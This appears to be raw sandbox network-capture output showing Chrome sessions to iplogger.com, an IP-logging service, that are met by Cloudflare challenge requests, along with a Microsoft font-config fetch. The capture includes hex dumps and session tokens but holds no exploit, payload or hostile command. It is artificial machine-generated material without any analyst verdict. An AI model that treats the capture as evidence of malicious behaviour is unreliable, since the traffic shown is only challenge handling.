accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
origin-agent-cluster: ?1
referrer-policy: same-origin
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
document-policy: js-profiling
2024-10-03 14:09:26 UTC | 52 | IN | Server: cloudflare
CF-RAY: 8ccd8289bc184228-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49740 | 104.21.76.57 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:26 UTC | 474 | OUT | GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4 HTTP/1.1
Host: iplogger.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:26 UTC | 668 | IN | HTTP/1.1 404 Not Found
Date: Thu, 03 Oct 2024 14:09:26 GMT
Content-Type: application/json
Content-Length: 7
Connection: close
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
cf-chl-out: 9YAxSII5M+ZAtE8iVLmbHaqnKrSzBArxjt8=$h6/2OtBz6jJ2qovu
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PL11DEF35axLvu1e4nXFHkYZwCyzHamE15DPr%2B97hhyZDFnMfT1gKdsriaOL12CqmHw4oPC9DGjmeGh7yQGQdui%2B1jdBZvv5sT54PrrKEfbgS8VMFc7ig56pfI1Ls14%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccd828e6ebb78db-EWR
2024-10-03 14:09:26 UTC | 7 | IN | Data Raw: 69 6e 76 61 6c 69 64
Data Ascii: invalid


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49738 | 184.28.90.27 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:26 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
Range: bytes=0-2147483646
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-10-03 14:09:26 UTC | 514 | IN | HTTP/1.1 200 OK
ApiVersion: Distribute 1.1
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
Content-Type: application/octet-stream
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
Server: ECAcc (lpl/EF06)
X-CID: 11
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-weu-z1
Cache-Control: public, max-age=25941
Date: Thu, 03 Oct 2024 14:09:26 GMT
Content-Length: 55
Connection: close
X-CID: 2
2024-10-03 14:09:26 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49739 | 104.21.76.57 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:26 UTC | 347 | OUT | GET /favicon.ico HTTP/1.1
Host: iplogger.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:26 UTC | 848 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:26 GMT
Content-Type: image/x-icon
Content-Length: 2833
Connection: close
last-modified: Tue, 07 Jun 2022 11:44:38 GMT
etag: "629f3a26-b11"
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 4195
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccd828eeab541e1-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49742 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:27 UTC | 731 | OUT | GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:27 UTC | 301 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:27 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 114951
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8294ec948c12-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49741 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:27 UTC | 796 | OUT | GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:27 UTC | 210 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:27 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8294ee02c35b-EWR
2024-10-03 14:09:27 UTC | 61 | IN | Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49746 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:28 UTC | 438 | OUT | GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:28 UTC | 210 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:28 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8298aebf0ce9-EWR
2024-10-03 14:09:28 UTC | 61 | IN | Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49747 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:29 UTC | 433 | OUT | GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:29 UTC | 301 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:29 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 126857
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd829e7e3a8c5d-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49748 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:29 UTC | 927 | OUT | POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 3622
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 6e64b4d206e3507
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:29 UTC | 3622 | OUT
2024-10-03 14:09:29 UTC | 717 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 152224
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: jxmH+AeprZPhgCHvC3/EVF74NDPpwivaW33DnfdvBpsoOVsQ/rfoOa3NiGdBWV8v0FN0xExIETp114EU6LC8GRdYJ0JkKCgmWhZtsLkBfKvxhLs/8ZlgrvmWaRFMl67mY/rnLA5l34/ZrNPmPLZc7n6AJ7Zsx/tpW9f+zuHhvBbQ0Jxs8nv96/ypQ0DjukK/8cYJpnv24AFkGWamR9hwBbyazmrTWXujWzcfj00ULGby+HV6s88HJO7O60Fb76SMpeFzu6LDAvGYNAM2tEyZdkuvLRmSTjPFT1ajgkmJ3TwIhPMApPBsjNRPRrfRSOw8EU1TSeOLYIeK+OwYO+T9WTyEPNtDVofor+s/SwmSZCon3WTgujamN0OjIpvDgqJeW8LBCn8lktGllJkZyONTRn65gMDaCwp0D3saj+J2/NRaGsGLQt6NBPM1egYW6Trli+uDMS6YGmffIR7GTyTSZC3Hw/HwF9vGXnjRMu2MxjjuZYs=$f7o2Jd56X2UrbSdY
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd829e7939727a-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49749 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:30 UTC | 487 | OUT | GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:30 UTC | 349 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:30 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                cf-chl-out: CzgMDO/BwEel+DB7nEC3Dd3/PfMfGjf1dhE=$Jtb4oHRz4NtbQo4y
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82a55cd00f8b-EWR
2024-10-03 14:09:30 UTC | 7 | IN | Data Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49750 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:30 UTC | 815 | OUT | GET /cdn-cgi/challenge-platform/h/g/pat/8ccd8289bc184228/1727964569365/186f8d6e14d4fe0eb3804fd1be46d1535ddfe35c7ad2d6cb8e9dce82775fb104/hz5T_VEh25F25lZ HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:30 UTC | 143 | IN | HTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gGG-NbhTU_g6zgE_RvkbRU13f41x60tbLjp3OgndfsQQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-10-03 14:09:30 UTC | 1 | IN | Data Raw: 4a
Data Ascii: J


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49751 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:31 UTC | 786 | OUT | GET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1
Host: challenges.cloudflare.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:31 UTC | 170 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:31 GMT
Content-Type: image/png
Content-Length: 61
Connection: close
Server: cloudflare
CF-RAY: 8ccd82ac3fb1430f-EWR
2024-10-03 14:09:31 UTC | 61 | IN | Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 37 08 02 00 00 00 e2 cb df 80 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
Data Ascii: PNGIHDR 7IDAT$IENDB`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49752 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:32 UTC | 428 | OUT | GET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1
Host: challenges.cloudflare.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:32 UTC | 170 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:32 GMT
Content-Type: image/png
Content-Length: 61
Connection: close
Server: cloudflare
CF-RAY: 8ccd82b42b8841a3-EWR
2024-10-03 14:09:32 UTC | 61 | IN | Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 37 08 02 00 00 00 e2 cb df 80 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
Data Ascii: PNGIHDR 7IDAT$IENDB`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49753 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:32 UTC | 928 | OUT | POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
Host: challenges.cloudflare.com
Connection: keep-alive
Content-Length: 32608
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Content-type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
CF-Challenge: 6e64b4d206e3507
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://challenges.cloudflare.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:33 UTC | 300 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:33 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 26828
Connection: close
cf-chl-gen: dXSDS9r/92cyz+E4OOMTmONK51sn+w8sTQ2VJS8k6xFoVc1mKRUPJPce4Cpg8pVOQfTf3TuKvSAHKsOH$3cBzSq6N6v4Slhzt
Server: cloudflare
CF-RAY: 8ccd82b479cc0cae-EWR
